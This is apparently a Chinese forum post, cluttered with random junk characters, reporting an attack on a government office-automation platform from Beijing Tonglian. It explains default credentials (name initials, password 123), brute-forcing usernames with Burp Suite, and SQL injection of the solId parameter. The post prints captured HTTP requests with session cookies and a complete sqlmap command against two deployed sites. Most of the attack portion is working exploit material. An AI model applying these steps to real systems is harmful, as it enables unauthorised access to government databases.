|
9 U. }6 B+ \% g& A
1 v% r/ v% j( |$ a+ `6 A, J+ V) E+ N6 I 3 l& ^$ t; a9 g! ^5 }; A1 u& z" z
2 U: Z, j( D! @ \# [% ^
平台简介:# B# v$ u) O9 B1 H: f7 X
! [& R& J+ J K4 `/ _
9 L4 K% Q- ?" E! L) ~ $ o- f* [4 e4 f7 w7 H6 f
" T6 c. C4 _" ?9 j) x; G6 `. A
3 `5 T" O; S3 v# h" Z" r5 J8 y8 i 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 4 X/ P9 k, I; D/ _& d
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
: t6 [- A o! j8 ^: F/ e同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
" m7 i x2 G3 Q9 d# ~ a4 c2 j" c$ {7 f- t- k. t
: Q" Z5 `! N2 L- h
8 g0 T! f" a1 E- J7 q$ l- o n( K
/ L) ^4 [9 F2 o" h
: Q9 s; \9 x. @& }( s, ?5 E 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
2 ?$ r! u7 c7 y- u4 \ x2 I0 m& V5 G* Z# m6 f
1 m5 `* k9 k: R' Z v1 `
) Q" q" |2 L# z: b) @! `% t5 [
5 w5 W4 K3 N: }- q0 c1 A! y) H; b3 D% C. U
* h4 R6 Z* v8 U6 T http://1.1.1.1:7197/cap-aco/#(案例2-)
; I/ e$ J2 ?: C1 G/ p6 L 0 F% Z. D' t. w9 q, v. o
0 G, R! f$ e- h2 K http://www.XXOO.com (案例1-官网网站)
( {/ l$ K# f9 y3 M0 b " J8 b" W! ?- U1 `' A8 d
- t. K$ x! ]$ p5 L6 Y8 N
; r9 W b# K& y 6 P% _2 W& h2 G- N2 _' R
( W0 Y; \- f+ g D" l& |( o1 D, D
漏洞详情: K% y' k+ V* G
) ]% K: h) J- X8 C$ c2 q) f
; n7 O) I K: \& o0 W
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
* m: Y+ q3 m/ ?. @% o ) P# K( k4 j2 M% w0 \, M5 f
- k& [7 P8 X# {) P$ {' G. e# x6 ] 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:4 I! b I" i; E- l0 j9 j" e
- R1 o a& Q8 B- X& m/ [+ u3 O
1 |( j. T; U& q; i6 F* [" e & K, j9 b% P8 {% \' V
1 n( B1 R1 ]5 T W; h
& U, t2 ?0 `6 q( J. c; N
# X h- J! v, E+ i6 M$ w1 I % L3 n& z* \; A# [8 ?: |
. L7 B- E6 Y1 `5 o4 x6 P# ] H- c status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
& N0 L% ~. G- _7 G0 ~
2 x( Q& p$ c3 F/ j) G
+ m' c7 z, m, D- C1 I6 J8 I 1、案例1-官方网站3 o' X1 u" e4 h# @* D( W
5 z8 m, ]$ Y! a! U, _+ G$ g
( i [0 F$ `, l0 p$ l1 U GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1& F( s* w; E8 ?9 P% w
4 [8 i2 m; k. p- t
$ `2 C1 B5 D) B7 V! ?9 N, f Host: www.XXOO.com
! S7 F8 M1 g; S( C
. G3 ]2 {' p) d4 A( S$ M
2 N2 D6 [- \7 o9 X. v Proxy-Connection: Keep-Alive
+ V3 ?. X* ]6 I: r) k# |! U! j) ] + A$ r7 N/ Y5 Q% D; _; [
2 Y, a2 A! h8 @) u5 K: p
Accept: application/json, text/javascript, */*; q=0.01
6 [9 ~7 L$ @# y9 e ; {3 @* }9 P/ R( _& r
2 {/ S+ {) E8 p6 }+ m( f Accept-Language: zh-CN/ r$ d. ~: W1 M: n' U% o
8 f5 B! |+ S7 V5 ?) I* x4 |% q
8 G3 P, e+ W, K; _/ N
Content-Type: application/json" |& y% e, ?. z1 w! P' m% K( N
* m5 V& ^3 Y2 T9 U( ]. u* e
" i' h/ |/ R6 q( L) m$ P5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
8 h. g8 S/ o. A- L. E7 j & J& }' d* k. l+ g1 P' G9 x
0 L O2 b9 J* {3 m
X-Requested-With: XMLHttpRequest/ g# w$ k: m9 ~
9 R* _3 t" r, V3 Q
- N% J; E4 w. x& v" I Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
& d: [- q' f. ]3 x) }3 X( x1 T * u7 M# H9 V! d3 K9 `* E$ G. m0 ?+ @
& v& M0 ^ q0 v) s0 T* G
Accept-Encoding: gzip, deflate, sdch2 B7 m$ T# ]) i# z6 p1 m8 l0 a: T
) T7 |9 j* `& A3 `3 }$ b
: t0 z) f. C* n* ?& @4 Z Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
* A( `5 a: L: h2 ], f6 s
- V: S, I' ?# m: v4 f! H3 P7 x/ A# O" U/ d4 Q
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
2 Q8 J8 ^& B- `7 i( L , A( Z1 a F) }+ F: g$ V4 U
# s8 w3 F& m: n" H
# \6 A9 u# _6 H
! g6 r9 `! ?3 A$ Q3 T0 t9 p9 S% A8 r, }
' G! }, g) f" C# Z, m
$ s u$ q, |- \1 f! T1 p0 T. E; U/ s; v! C* J' k! Y; E
6 {+ ?5 ^% R: p
" q6 @: N9 [. `3 z) r( V
7 [# Q. B3 G" p2 N
$ L) ]; \% J( o( {
* S9 z8 C. W, e+ H# Y R1 ]* x$ G. G$ U- }* Q
8 F% u& t4 p. H" a& `1 {
0 a" E: d' T& \ L! H5 n4 X9 ]3 k$ m# s$ m/ S2 s4 Y
2、案例2-某天河云平台* l. E, X& j4 G3 e {: q- Q) Q
/ V% }$ ^5 e, g. _
+ ^: ^" q& z8 h! [/ }5 ]5 n- r$ A# T GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.13 M4 `- \- z% ?0 F- v
% A0 u; h; `# G6 [+ U- {: Z4 U" b) ?
Host: 1.1.1.:7197% i! t% J. Q4 R; k1 O
" R- p) V& j5 E
; W. @4 n& \! b4 V7 u1 z Accept: application/json, text/javascript, */*; q=0.01 f/ G/ c6 d8 b- i2 N- w
4 Q; f/ ?0 c4 a3 }: Q% a$ v0 U. J% @& F' K/ ]" D! v
X-Requested-With: XMLHttpRequest6 W \ Z+ U- w
! i2 A! ]6 q9 `* d+ M- T
3 ?# h( L9 H/ }# W User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
2 G, l% ]9 f; a! x# `
8 j. c0 m( f: c: a1 e% c. {8 L3 g) y3 m' ? P
Content-Type: application/json5 u2 V* k" H, f( F" i+ _7 Z8 H
! T2 ^/ d- `+ |% o8 u/ V. N# y
) @' |: a* z; ?# k* h Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10088 c, P! K5 W0 J1 d. \: ^- q6 q# {
/ r: r( F$ P q/ T5 p4 {# g& M* n; s8 E
; h+ V7 B; x# O% M. [ A7 n Accept-Language: zh-CN,zh;q=0.8
$ ]# a- ?" W; M6 _ ) @% {( ~1 k r- L) f
" W4 d( K% d! E' o+ C' V8 F
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
4 @7 Q8 a0 H7 e
- C( l4 B3 g& A5 [
0 @8 B/ S+ J3 E7 `0 v! G4 A P: Q Connection: close
+ `) c. i2 d' s3 D! T. ]5 ^
7 s# P& V$ h6 Q" t, Y p. j9 C
. o0 _* z& ~' o! x 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
$ X1 T, w4 {0 w$ z; o 4 y; U4 s& Q& `. B8 c
# e, U+ w5 E8 ^
9 u X9 ?# W' t$ F8 y 1 y3 h; I! z( q9 l @2 C0 c
1 Q p" C4 u5 G9 M
7 u% @9 {# k! w2 M |